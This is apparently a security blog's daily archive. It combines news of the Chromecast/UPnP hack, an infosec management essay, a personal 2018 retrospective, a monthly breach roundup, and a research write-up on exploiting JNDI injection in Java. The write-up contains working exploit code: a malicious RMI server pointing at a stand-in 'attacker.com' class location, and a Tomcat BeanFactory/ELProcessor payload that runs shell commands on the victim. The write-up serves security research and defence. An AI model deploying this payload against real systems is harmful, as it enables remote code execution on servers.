Daily Archives: January 3, 2019

Hackers Exploit Known Google Chromecast Vulnerability in Thousands of Devices

Veracode Google Chromecast PewDiePie Hack

Starting the New Year off with a bang, Hacker Giraffe and J3ws3r reportedly exploited a vulnerability in thousands of Google Chromecast streaming devices. The CastHack bug, allegedly disclosed nearly five years ago, enabled the hackers to remotely access thousands of the streaming devices, causing them to show a pop-up notice on connected TVs alerting users that their misconfigured router is leaving them vulnerable to more disruptive attacks. While they were at it, they also asked those reading the notice to subscribe to PewDiePie’s YouTube channel.

In 2014, Bishop Fox figure out that it could access and control a Chromecast device by disconnecting it from its existing Wi-Fi network in a deauth attack and reverting it to its factory state. Then, attackers needed to be within range of the Wi-Fi network to gain access, but the attack method has since evolved. Some home routers use Universal Plug and Play (UPNP) networks, which forward ports from the internal network to the internet, allowing connected devices to be viewed and accessed remotely.

“UPnP has been problematic for years. The protocols exist to make interconnectivity of devices simpler for users,” said Paul Farrington, director, EMEA & APJ Solutions Architecture at Veracode. “The idea behind UPnP is nice, but in the context of a hostile attack landscape, it exposes internal networks to risk. The problem with the Chromecast device is that Google haven’t really designed it to anticipate a hostile environment – one in which devices can be directly exposed to the internet.”

Consumers Need More Security Education to Protect Their Networks and Devices

A spokesperson from Google told TechCrunch, “We have received reports from users who have had an unauthorized video played on their TVs via a Chromecast device. This is not an issue with Chromecast specifically, but is rather the result of router settings that make smart devices, including Chromecast, publicly reachable.”

While some devices and software applications may rely on UPnP, the majority don’t, and Farrington advises home users to turn it off on their Internet routers. Still, there is more that device manufacturers and Internet Service Providers (ISPs) could do to help educate consumers about device security and providing secure configurations.

“Before network and software engineers create products, they really need to think about the adversary,” Farrington notes. “Asking the question, ‘how would the attacker benefit from this design feature’ should be a constant question that is asked within development teams. Threat Modelling is a term used to describe an approach of identifying ‘secure by design’ architectures that make sensible trade-offs on risk vs. benefit. Upfront thinking about security, coupled with continuous security testing is really the only way to address the modern challenge of keeping consumers safe from hackers.”

Scan data from Veracode’s State of Software Security Report Volume 9 shows that DevSecOps teams that embed continuous, automated security testing into their routine eliminate security defects 11.5 times faster than those that test more infrequently. Building security in across the SDLC is a competitive advantage for both B2B and B2C organizations. The last few years have shown that consumers are increasingly experiencing breaches of their personal information and devices, and will want to ensure that they’re secure when they make buying decisions.

Exploiting JNDI Injections in Java

Exploiting JNDI Injections in Java

Java Naming and Directory Interface (JNDI) is a Java API that allows clients to discover and look up data and objects via a name. These objects can be stored in different naming or directory services, such as Remote Method Invocation (RMI), Common Object Request Broker Architecture (CORBA), Lightweight Directory Access Protocol (LDAP), or Domain Name Service (DNS).

In other words, JNDI is a simple Java API (such as 'InitialContext.lookup(String name)') that takes just one string parameter, and if this parameter comes from an untrusted source, it could lead to remote code execution via remote class loading.

When the name of the requested object is controlled by an attacker, it is possible to point a victim Java application to a malicious rmi/ldap/corba server and response with an arbitrary object. If this object is an instance of "javax.naming.Reference" class, a JNDI client tries to resolve the "classFactory" and "classFactoryLocation" attributes of this object. If the "classFactory" value is unknown to the target Java application, Java fetches the factory's bytecode from the "classFactoryLocation" location by using Java's URLClassLoader.

Due to its simplicity, It is very useful for exploiting Java vulnerabilities even when the 'InitialContext.lookup' method is not directly exposed to the tainted data. In some cases, it still can be reached via Deserialisation or Unsafe Reflection attacks.

Example of the vulnerable app:

	@RequestMapping("/lookup")
	@Example(uri = {"/lookup?name=java:comp/env"})
	public Object lookup(@RequestParam String name) throws Exception{
	    return new javax.naming.InitialContext().lookup(name);
	}

Exploiting JNDI injections before JDK 1.8.0_191

By requesting "/lookup/?name=ldap://127.0.0.1:1389/Object" URL, we can make the vulnerable server connect to our controlled address. To trigger remote class loading, a malicious RMI server can respond with the following Reference:

public class EvilRMIServer {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);
 
        //creating a reference with 'ExportObject' factory with the factory location of 'http://_attacker.com_/'
        Reference ref = new javax.naming.Reference("ExportObject","ExportObject","http://_attacker.com_/");
 
        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("Object", referenceWrapper);
    }
}

Since "ExploitObject" is unknown to the target server, its bytecode will be loaded and executed from "http://_attacker.com_/ExploitObject.class", triggering an RCE.

This technique worked well up to Java 8u121 when Oracle added codebase restrictions to RMI. After that, it was possible to use a malicious LDAP server returning the same reference, as described in the "A Journey from JNDI/LDAP manipulation to remote code execution dream land" research. A good code example may be found in the 'Java Unmarshaller Security' Github repository.

Two years later, in the Java 8u191 update, Oracle put the same restrictions on the LDAP vector and issued CVE-2018-3149, closing the door on JNDI remote classloading. However, it is still possible to trigger deserialisation of untrusted data via JNDI injection, but its exploitation highly depends on the existing gadgets.

Exploiting JNDI injections in JDK 1.8.0_191+

Since Java 8u191, when a JNDI client receives a Reference object, its "classFactoryLocation" is not used, either in RMI or in LDAP. On the other hand, we still can specify an arbitrary factory class in the "javaFactory" attribute.

This class will be used to extract the real object from the attacker's controlled "javax.naming.Reference". It should exist in the target classpath, implement "javax.naming.spi.ObjectFactory" and have at least a "getObjectInstance" method:

public interface ObjectFactory {
/**
 * Creates an object using the location or reference information
 * specified.
 * ...
/*
    public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                    Hashtable environment)
        throws Exception;
}

The main idea was to find a factory in the target classpath that does something dangerous with the Reference's attributes. Looking at the different implementations of this method in the JDK and popular libraries, we found one that seems very interesting in terms of exploitation.

The "org.apache.naming.factory.BeanFactory" class within Apache Tomcat Server contains a logic for bean creation by using reflection:

public class BeanFactory
    implements ObjectFactory {
 
    /**
     * Create a new Bean instance.
     *
     * @param obj The reference object describing the Bean
     */
    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                    Hashtable environment)
        throws NamingException {
 
        if (obj instanceof ResourceRef) {
 
            try {
 
                Reference ref = (Reference) obj;
                String beanClassName = ref.getClassName();
                Class beanClass = null;
                ClassLoader tcl =
                    Thread.currentThread().getContextClassLoader();
                if (tcl != null) {
                    try {
                        beanClass = tcl.loadClass(beanClassName);
                    } catch(ClassNotFoundException e) {
                    }
                } else {
                    try {
                        beanClass = Class.forName(beanClassName);
                    } catch(ClassNotFoundException e) {
                        e.printStackTrace();
                    }
                }
 
                ...
 
                BeanInfo bi = Introspector.getBeanInfo(beanClass);
                PropertyDescriptor[] pda = bi.getPropertyDescriptors();
 
                Object bean = beanClass.getConstructor().newInstance();
 
                /* Look for properties with explicitly configured setter */
                RefAddr ra = ref.get("forceString");
                Map forced = new HashMap<>();
                String value;
 
                if (ra != null) {
                    value = (String)ra.getContent();
                    Class paramTypes[] = new Class[1];
                    paramTypes[0] = String.class;
                    String setterName;
                    int index;
 
                    /* Items are given as comma separated list */
                    for (String param: value.split(",")) {
                        param = param.trim();
                        /* A single item can either be of the form name=method
                         * or just a property name (and we will use a standard
                         * setter) */
                        index = param.indexOf('=');
                        if (index >= 0) {
                            setterName = param.substring(index + 1).trim();
                            param = param.substring(0, index).trim();
                        } else {
                            setterName = "set" +
                                         param.substring(0, 1).toUpperCase(Locale.ENGLISH) +
                                         param.substring(1);
                        }
                        try {
                            forced.put(param,
                                       beanClass.getMethod(setterName, paramTypes));
                        } catch (NoSuchMethodException|SecurityException ex) {
                            throw new NamingException
                                ("Forced String setter " + setterName +
                                 " not found for property " + param);
                        }
                    }
                }
 
                Enumeration e = ref.getAll();
 
                while (e.hasMoreElements()) {
 
                    ra = e.nextElement();
                    String propName = ra.getType();
 
                    if (propName.equals(Constants.FACTORY) ||
                        propName.equals("scope") || propName.equals("auth") ||
                        propName.equals("forceString") ||
                        propName.equals("singleton")) {
                        continue;
                    }
 
                    value = (String)ra.getContent();
 
                    Object[] valueArray = new Object[1];
 
                    /* Shortcut for properties with explicitly configured setter */
                    Method method = forced.get(propName);
                    if (method != null) {
                        valueArray[0] = value;
                        try {
                            method.invoke(bean, valueArray);
                        } catch (IllegalAccessException|
                                 IllegalArgumentException|
                                 InvocationTargetException ex) {
                            throw new NamingException
                                ("Forced String setter " + method.getName() +
                                 " threw exception for property " + propName);
                        }
                        continue;
                    }
...

The "BeanFactory" class creates an instance of arbitrary bean and calls its setters for all properties. The target bean class name, attributes, and attribute's values all come from the Reference object, which is controlled by an attacker.

The target class should have a public no-argument constructor and public setters with only one "String" parameter. In fact, these setters may not necessarily start from 'set..' as "BeanFactory" contains some logic surrounding how we can specify an arbitrary setter name for any parameter.

/* Look for properties with explicitly configured setter */
RefAddr ra = ref.get("forceString");
Map forced = new HashMap<>();
String value;
 
if (ra != null) {
    value = (String)ra.getContent();
    Class paramTypes[] = new Class[1];
    paramTypes[0] = String.class;
    String setterName;
    int index;
 
    /* Items are given as comma separated list */
    for (String param: value.split(",")) {
        param = param.trim();
        /* A single item can either be of the form name=method
         * or just a property name (and we will use a standard
         * setter) */
        index = param.indexOf('=');
        if (index >= 0) {
            setterName = param.substring(index + 1).trim();
            param = param.substring(0, index).trim();
        } else {
            setterName = "set" +
                         param.substring(0, 1).toUpperCase(Locale.ENGLISH) +
                         param.substring(1);
        }

The magic property used here is "forceString". By setting it, for example, to "x=eval", we can make a method call with name 'eval' instead of 'setX', for the property 'x'.

So, by utilising the "BeanFactory" class, we can create an instance of arbitrary class with default constructor and call any public method with one "String" parameter.

One of the classes that may be useful here is "javax.el.ELProcessor". In its "eval" method, we can specify a string that will represent a Java expression language template to be executed.

package javax.el;
...
public class ELProcessor {
...
    public Object eval(String expression) {
        return getValue(expression, Object.class);
    }

And here is a malicious expression that executes arbitrary command when evaluated:

 {"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()")}

Chaining all things together

After the patch, there is almost no difference between LDAP and RMI for exploitation purposes, so for simplicity we will use RMI.

We are writing our own malicious RMI server that responds with a crafted "ResourceRef" object:

import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;
 
public class EvilRMIServerNew {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);
 
        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "x=eval"));
        //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()\")"));
 
        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("Object", referenceWrapper);
    }
}

This server responds with a serialized object of 'org.apache.naming.ResourceRef', with all crafted attributes to trigger the desired behaviour on the client.

Then we trigger JNDI resolution on the victim Java process:

new InitialContext().lookup("rmi://127.0.0.1:1097/Object")

Nothing undesirable will happen when this object is deserialised. But since it still extends "javax.naming.Reference", the "org.apache.naming.factory.BeanFactory" factory will be used on the victim's side to get the 'real' object from the Reference. At this stage, a remote code execution via template evaluation will be triggered and the 'nslookup jndi.s.artsploit.com' command will be executed.

The only limitation here is that the target Java application should have an "org.apache.naming.factory.BeanFactory" class from the Apache Tomcat Server in the classpath, but other application servers may have their own object factories with the dangerous functionality inside.

Solution:

The actual problem here is not within the JDK or Apache Tomcat library, but rather in custom applications that pass user-controllable data to the "InitialContext.lookup()" function, as it still represents a security risk even in fully patched JDK installations. Keep in mind that other vulnerabilities (such as 'Deserialisation of untrusted data' for example) may also lead to JNDI resolution in many cases. Preventing these vulnerabilities by using a source code review is always a good idea.

 

Business Must Change: InfoSec in 2019

I don't know about you, but I am happy to see 2018 ended. Personally, it was a very difficult year, capping a very difficult decade. Now, as we embark into 2019, it's time to sit up and realize that we've now been in this world of e-commerce for more than 20 years (yes, really!). Many, many, many things have changed dramatically over that time, whether it be electronics (smartphones!) or communication (social media!) or transportation (electric vehicles!). However, one thing that really has not changed much is how businesses function, which is really quite sad if you think about it.

There is tons of research and evidence that shows we're now clearly within the 4th industrial age. We all know about the 1st and 2nd industrial revolutions, with the first lasting about 100 years and ending around WWI, and the second being slightly shorter and ending around the end of WWII, but many people don't realize that the 3rd age - of analog-digital transformation, mechanical automation, and industrial transformation - occurred up until sometime in the 1980s or 1990s (dividing lines are always fuzzy with such things). That said, there was definitely a watershed moment in the mid-1990s marking a clear transition from the old Deming-era industrial ways to this modern digital era.

That brings us to 2019... and the imperative for drastic changes across the board, and in particular with how businesses are structured and function (vs. the current dysfunction). More importantly, these changes are also necessary if we have any hope of fixing our organizations to be more secure and to quit hemorrhaging cash at alarming rates, whether it be from massive breaches or insane spending on pointless tools or simply just being wasteful. Here's what I believe needs to happen ASAP, and is especially important in this fragile and declining (American) economy:

1) Flat, Agile, Lean, Empowered, Generative

First and foremost, organizations need to reinvent themselves. I'm a huge proponent of Frédéric Laloux's Reinventing Organizations (http://www.reinventingorganizations.com/) in which he talks about a better way to structure and manage. Specifically, he advocates for a flatter structure in which people are empowered to make decisions and take actions in the best interests of the whole. No, this does not mean outright anarchy and chaos, but instead advocates for nurturing a caretaker attitude within all employees such that they truly care. This is a very difficult thing to do! Especially for large enterprises, can you imagine a culture-shift that makes people care about the org and the missions and the products/services being created/provided? Daunting, to say the least.

One of the ways to get there, however, is to start adopting practices from Agile and Lean and start applying them to business management. Small teams should operate in a manner that is reasonably autonomous and empowered. You're asking people to do a task, so let them do it! However, what they do should be within a framework that emphasizes the greater good, lean principles (like eliminating waste), and - most importantly - thinking about generativity (that is, the lasting impact and sustainability of the work for and on future generations). I would submit that this seemingly small (but not trivial) change in management can have HUGE impact overall, including on the security of the organization.

Consider, if you will, that fundamentally we in infosec want people to make better decisions. Truly, that's at the core of much that we do. Those "better decisions" might equate to not falling for (spear)phishing attacks, choosing hardened environments over default installs, or following reasonable secure coding practices in the development process (to name a few). However, when people are empowered to make their own decisions and are held accountable for the lasting impacting, then and only then will they start adopting more of a caretaker mentality and start considering long-term impacts. BUT!!! - and this is very important - it also means breaking from the micromanagement techniques that have become so prevalent in business over the past 20 years. Because so much work is intangible (not physical products being produced), it is vastly more difficult to monitor and manage for quality. As such, part of this reinvention of business operations is to completely throw away factory-style TQM practices (including those created by Deming) in favor of digital-style TQM practices that better measure modern-day business functions and outputs. Ergo, what seems so small is in no way trivial or easy.

2) DevOps, Automation, and Outsourcing

This conversation naturally brings is to the DevOps movement, which is singularly the most important "invention" of the past decade. It provides a roadmap for how organizations should function overall. Key within DevOps is the notion of automation, but also equally important is the notion of outsourcing, whether that be to cloud providers or consultants/specialists or other "*-as-a-Service" providers (e.g., mainframes-as-a-service). No matter how you look at it, DevOps is the way that business should operate, and that is - interestingly enough - exactly matched to the org management model that Laloux describes (without ever getting into technology or DevOps!).

First and foremost, let's talking about what DevOps is: it's a cultural movement designed to fundamentally alter how business functions. It is not just about agile or automation or tools/toolchains or anything so simple or crass. It is a broad-scale change in business model and operation; and, it applies to everyone! Know what else parallels this target audience of *everyone*? That's right, it's infosec. Further, just as DevOps advocates applying agile and lean principles (among other things) to business operations, so does infosec advocate applying better security and risk mgmt principles to everything in the organization, too. How do you get people to make better decisions? You educate them, you help them optimize their flow, you provide timely and relevant feedback (preferably as quickly as possible), and you structure in resilience such that when failures happen (they will), they don't bring down the entire organization. Those are the Three Ways of DevOps as introduced within The Phoenix Project way back in 2013.

From a functional perspective, this means a few very specific things for infosec: 1) We must continue to work in a collaborative and consultative manner with everyone else in the organization. 2) We must heavily emphasize ways to automate much of what we're doing to minimize the overhead and functional impact on business operations while trying to achieve our desired goals (e.g., through federated identity with MFA, through deployment of SOAR tools to automate much of otherwise-wasteful SOC practices, through extensive process automation around all forms of access control/mgmt). 3) Similarly, we should continually push decision-makers within projects to ask, first and foremost, the "build or buy?" question, with an emphasis on outsourcing where possible. Our architectures should be built around APIs, integrations, and interoperability such that we avoid vendor lock-in as much as possible, have data portability (or, perhaps more accurately, application portability while we retain control to our own data), and find ways to optimize security and business by leveraging and integrating specialized resources.

3) InfoSec Bifurcation: Functional vs. Strategic

All of this discussion then brings us to a core challenge: we must change how infosec is structured, operates, and performs. Going forward, it's essential to bifurcate infosec between functional and strategic roles. Most functional roles should be directly embedded within technical teams, and should emphasize use of specialized resources. For example, we should not see large infosec/CISO organizations any more, but instead should see functional technical security resources, such as firewall engineers and appsec engineers, directly embedded into their closest related teams (e.g., network teams, dev/DevOps teams, etc.). Functional roles are specialists who are expert at particular operations.

To this end, we need to get away from these "everything but the kitchen sink" roles, whether they be called "security managers" or "security architects" or "DevSecOps engineers." These titles have become so buzzword-overloaded as to be completely meaningless! I have interviewed extensively over the past year+, and the one universal principle is that organizations are trying to find one magical, perfect hire with expert-level experience in anything and everything, which is just patently wrong and stupid and mythological. If you think you need someone who is expert in infosec AND development AND systems AND automation AND incident response AND AND AND... just stop. Please. You're seeking the impossible, setting yourself up for failure and disappointment, and - more importantly - you're causing pain (for yourself and others). Focus on the true functional requirements needed and go hire for that. Nobody can do it all (certainly not well), and there is incredible value in hiring a diverse set of personnel, whether they be FTEs or - far more likely these days - contractors. In fact, I would even go so far as to challenge people to stop thinking about full-time resources for all these functional roles, and instead think about DevOps and the gig culture and how to grab specialist contract resources as needed to perform project work and then move on. Truly, change your thinking and divert from the old, broken models.

Lastly, do invest in strategic resources. For example, a true security architect will have a broad background within strength of vision, the ability to run an entire project from start to finish (including: problem definition, solution identification and evaluation, solution testing/POC, and solution deployment). Managers and executives should also be strategic overall, focusing on ways to ensure that everything is agile, everything is lean (waste-reducing), and not micromanaging anything. For example, instead of riding a project hard to drive to completion, instead ask "Why is this project spec'd to take so long?" or "What are the obstacles to progress, completion, and success?" When looking at projects strategically, you will then find that you are instead looking at ways of working, how to be more agile, how to be more efficient and effective, and overall how to help empower people to work smarter. It's amazing the difference when you let people do their jobs and focus instead on helping them achieve their goals. Also, in doing this, it allows management ranks to thin and flatten, fewer managers can manage more projects and personnel, and so on. For infosec, this means finding and developing leaders and - of equal importance - not forcing people to leave their specialty behind simply to "move up the ranks." There shouldn't be ranks so much as effective leadership and the division between strategic and functional actors. Making this change will further the first two points above in reforming how the organization operates, while also allowing infosec progress to truly be made in a reformational matter.

---
I hope to write in more depth about all of these points in the coming weeks and months. First thing's first, though: I need a steady source of income! Yes, 2018 was rough, and it ended just as it had been going all along; on a major note of disappointment. But... a new year means the opportunity to turn the page, find something better. In the meantime, please take this message out to everyone and let's see if we can finally hit a tipping point in how businesses function and finally instigate meaningful change.

Cheers & Happy New Year!

2018 Retrospective

Presently sponsored by: Live Workshop! Watch the Varonis DFIR team investigate a cyberattack using our data-centric security stack

2018 Retrospective

I started doing these retrospectives 3 years ago in my first year of independence. I reckon they're a good thing for everyone to do if not in written form then at least mentally to look back on your achievements of the year. They're a great way of reflecting on success (and indeed, on failures) and they also help explain why we all feel so damn tired by the end of the year!

Here's my 2018 highlights, starting with travel:

Travel

"Oh yeah, I'm totally gonna travel less this year" - me every single year

In reality, my travel ended up looking like this:

2018 Retrospective

That's the same number as last year, 4 more days and another 8,000km. On the other hand, it's 12 less cities and 1 less country and the main reason for that is I've been trying to cram less into trips. I've also been travelling with family far more so whilst those 140 days equate to 38% of my year, there were 14 days in Hawaii, 10 days at the Aussie snow, 11 days in Texas and 17 days in Canada where I wasn't flying solo. That's 52 days where it wasn't just a lonely slog so I'm pretty happy about that.

Flight wise, App in the Air captured things in a nice visual fashion:

2018 Retrospective

That's up 15,000km, 17 hours and 3 flights from last year. So yes, travel went up but I also did a bunch of remote workshops which helped keep that down, as well sending Scott Helme to run in-person ones that contributed to keeping me on Aussie soil.

Blogging

I actually got a bit of a surprise when I pulled the list of my most popular blog posts for 2018:

2018 Retrospective

The surprise was that after the home page, the most popular page hit on my site was the one about Online Spambot, a post I published in August 2017. I guess it's maintained its traction due it being referenced in the HIBP description and there being a huge number of people finding themselves pwned. In fact, I'm sure that's why the next 3 blog posts are up there too because they're all from similar incidents (number 6 in that list was also from 2017).

If I'm honest though, my favourite post of the year was the one I published earlier this week on New Year's Eve - 10 Personal Finance Lessons for Technology Professionals. I love this post. I love the reaction it's had. I love that based on so much of the positive feedback I've had it might actually improve people's lives in away I don't think any previous post has before. Who knows, maybe this is something I'll even write more about in 2019 if there's an appetite.

The sponsorship model continued strongly too. It's been resoundingly well-received by both browsers to the site and the sponsors themselves and I've already booked 2019 out until August.

Speaking

Geez, where to start... Probably with my 2018 events page which lists everything I did of a public nature. What it doesn't do is list all the private events which pretty dramatically increases that list. Of the ones I can talk about, they included:

Microsoft in Copenhagen:

MVP Summit in Seattle:

Ascend in Vegas:

CRN Pipeline in Melbourne:

CRN Pipeline in Sydney:

Loco Moco Sec in Hawaii:

Infosecurity EU in London:

SSW in Sydney:

Cyber Edge in Sydney:

SailPoint in Sydney:

API Days in Melbourne:

Fortinet in Sydney:

TECHpalooza on the Gold Coast:

Texas Cyber Summit in San Antonio:

Dev Fest Weekend in Dallas:

Sibos in Sydney:

There were a bunch of NDCs to do, starting with London in Jan:

Then Oslo for NDC security:

My home on the Gold Coast in May:

And then Oslo again in June (incidentally, seen here doing my new favourite talk "Everything is Cyber-Broken" with Scott):

And Sydney in September:

Spending time at the Australian Cyber Security Centre here in Aus was also a wonderful experience:

And just to top it off, a keynote appearance in Microsoft Connect (albeit recorded from Aus):

And, yeah, I think that's all it was! Actually, it could have been much busier, I declined 76 events:

2018 Retrospective

I do actually keep track of all these and as it turns out, that's just 1 more event than I declined in 2017. I'm surprised about how closely these 2 years have tracked to each other in so many ways.

Why No HTTPS?

2018 was a great year for HTTPS. Looking at Scott's 2018 Alexa Top 1M analysis from August (his most recent 6-monthly publication), 52% of the world's top 1M sites are now served over HTTPS by default. On the one hand, we're only just past the half way point but on the other hand, it was only 31% a year earlier.

Because public shaming of poor security drives positive changes (a popular 2018 blog post that will get a lot of mileage for years to come), we made Why No HTTPS to call out the largest offenders both globally and per country:

2018 Retrospective

The positive stories are the ones you don't see here; the ones that are no longer on the list. Site like the ABC in Australia, the Daily Mail in the UK and Roblox in the US. They're the largest sites in their respective countries to drop off the list and there have been many, many more in the same boat. I've actually had developers from many organisations reach out requesting that the list be refreshed just so their site drops off. Shaming works in powerful ways 🙂

HTTPS is Easy

I didn't want to just shame organisations doing the wrong thing, I also wanted to help everyone get better at HTTPS. After all, HTTPS is easy, so I built HTTPS Is Easy:

2018 Retrospective

This became a great 4-part reference series with 5-minute videos which live up to the title. I'm enormously happy with how it was received, and frankly a bit overwhelmed that the community stepped up and translated it into 19 different languages including: Czech, Danish, Dutch, English, Estonian, Finnish, French, German, Greek, Indonesian, Italian, Norwegian, Persian, Polish, Portuguese, Russian, Slovenian, Spanish and Swedish. That's pretty awesome!

Have I Been Pwned

Geez, were to start on this one... In point form:

  1. Added 76 new data breaches
  2. Which encompassed 829,391,906 additional records
  3. Signed up 445,720 new subscribers
  4. Sent 1,224,377 breach notification emails to them
  5. And sent another 239,277 notifications to those monitoring domains
  6. Got the UK government on-boarded to monitor all gov domains
  7. Got the Aus government on too
  8. And the Spanish government
  9. Had the Estonian Police Force use it to notify their citizens
  10. Partnered with 1Password
  11. Integrated into both Firefox and 1Password
  12. Made stickers!

And probably 100 other things that should be in a retrospective but just flew by in a blur! But there was another aspect of HIBP which really took off in 2018 and it deserves its own heading:

Pwned Passwords

When I launched version 2 in Feb, this service really started to get traction. The k-anonymity model courtesy of Cloudflare was the real killer feature and a special mention goes to Junade Ali on that:

If you don't know the back-story on those lava lamps, this is a fun vid that's only a few minutes long:

Back to Pwned Passwords, the premise of checking to see if a password has been previously breached before allowing someone to use it has gained a lot of traction. I've seen dozens of use cases first hand (and there's probably hundreds I'll never know about), with EVE Online being the first big one:

Okta built an absolutely awesome browser extension:

And GitHub downloaded the hashes (freely available to everyone) and rolled it into a platform most of you reading this will be very familiar with:

Of those who do consume the k-anonymity API, I'm usually serving up somewhere between 4 and 6 million requests a day:

2018 Retrospective

There were a couple of cache flushes in there but just to give you a sense of how well optimised the service is to serve content directly from Cloudflare's edge nodes and not hit the origin server, here's the last week:

2018 Retrospective

That's a 99% cache hit ratio 😎

Report URI

Scott wrote a year in review piece this week so I'll defer to his overview for that but in short: heaps of new reporting types, a wizard that makes creating CSPs way easier, the launch of Report URI JS, heaps of both free subscriber and commercial customer growth and we're also pushing a few reports through these days too:

2018 Retrospective

But the highlight - without a doubt in my mind - is covered in this next section:

Awards

What. A. Year! In fact, what a couple of weeks and it all began with AusCERT's Award for Information Security Excellence, presented in my home town:

Then a week later I was in London and scoring the Grand Prix Prize for the Best Overall Security Blog alongside Scott Helme who also picked up a gong:

And then, a mere few more hours on at a different event:

It was, by any reasonable measure, a surreal experience. I can't imagine topping that again.

But as well as those ones there was my 8th Microsoft MVP award and my Regional Director status was also renewed. These have both been marvellous programs to be a part of over the years and I'm proud to have that ongoing association with Microsoft.

What's Next

I'm 2 weeks to the day out from heading back to Europe so the whole show starts again very soon. In many ways, 2019 will be more of the same but in other ways, there's a bunch of new things on the horizon. I've already committed to events in 3 new places I've never been before in the first half of the year so that'll be cool.

Beyond that, I honestly don't know. I have a view about 6 months out around travel commitments but the nature of this industry and indeed the role I play today is that I have absolutely no idea what will pop up overnight, let alone further along into 2019. But that's ok, it keeps things entertaining 🙂

Cyber Security Roundup for December 2018

The final Cyber Security Roundup of 2018 concludes reports of major data breaches, serious software vulnerabilities and evolving cyber threats, so pretty much like the previous 11 months of the year.

5.3 millions users of "make your own avatar" app Boomoji had their accounts compromised, after the company reportedly didn't secure their internet connected databases properly. "Question and Answer" website Quora also announced the compromise of 100 million of its user accounts following a hack.


A large data breach reported in Brazil is of interest, a massive 120 million Brazilian citizens personal records were compromised due to a poorly secured Amazon S3 bucket. This is not the first mass data breach caused by an insecure S3 bucket we've seen in 2018, the lesson to be learnt in the UK, is to never assume or take cloud security for granted, its essential practice to test and audit cloud services regularly.

Amongst the amazing and intriguing space exploration successes reported by NASA in December, the space agency announced its employee's personal data may had been compromised. Lets hope poor security doesn't jeopardise the great and highly expensive work NASA are undertaking.  
NASA InSight Lander arrives on Mars 

It wouldn't be normal for Facebook not to be in the headlines for poor privacy, this time Facebook announced a Photo API bug which exposed 6.8 million user images

Away from the political circus that is Brexit, the European Parliament put into a law a new Cybersecurity Act. Because of the Brexit making all the headlines, this new law may have gone under the radar, but it certainly worth keeping an eye on, even after UK leaves the EU. The EU Parliament has agreed to increase the budget for the ENISA (Network & InfoSec) agency, which will be rebranded as the "EU Agency for Cybersecurity". The Cybersecurity Act will establish an EU wide framework for cyber-security certifications for online services and customer devices to be used within the European Economic Area, and will include IoT devices and critical infrastructure technology. Knowing the EU's love of regulations, I suspect these new best practice framework and associated accreditations to be turned into regulations further down the line, which would impact any tech business operating in European Union.

The UK Parliament enacted the "The Health and Social Care (National Data Guardian) Act", which also went under the radar due to all the Brexit political noise. The act requires the appointment of a data guardian within England and Wales. The data guardian will publish guidance on the processing of health and adult social care data for use by public bodies providing health or social care services, and produce an annual report.

Chinese telecoms giant Huawei had plenty of negative media coverage throughout December, with UK government pressuring BT into not using Huawei kit within BT's new 5G network, due to a perceived threat to UK's future critical national infrastructure posed by the Chinese stated-backed tech giant.  The UK Defence Secretary Gavin Williamson said he had "very deep concerns" about Huawei being involved in new UK mobile network.
Security company Insinia cause controversy after it took over the Twitter accounts by Eamon Holmes, Louis Theroux and several others celebs. Insinia said it had managed the account takeover by analysing the way Twitter handles messages posted by phone, to inject messages onto the targeted accounts by analysing the way the social network interacted with smartphones when messages are sent. However, Insinia were accused of being unethical and breaking the UK Computer Misuse Act in some quarters.

Unsecured internet connected printers are being hacked again, this time they were used to sent print out messages of support for Swedish YouTube star PewDiePie. A hacker named TheHackerGiraffe was said to have targeted up 50,000 printers after using Shodan to search for open printer ports online, the scan was said to have found 800,000 vulnerable printers.

An Financial Conduct Authority (FCA) report warned UK banks about their over-reliance on third-party security providers. The FCA said companies "generally lacked board members with strong familiarity or specific technical cyber-expertise. External expertise may be helpful but may also, if overly relied on, undermine the effectiveness of the ‘three lines of defence’ model in identifying and managing cyber-risks in a timely way. The report also warned about supply-chain security, especially the role that firms play in other organisations’ supply chains.

NEWS

AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS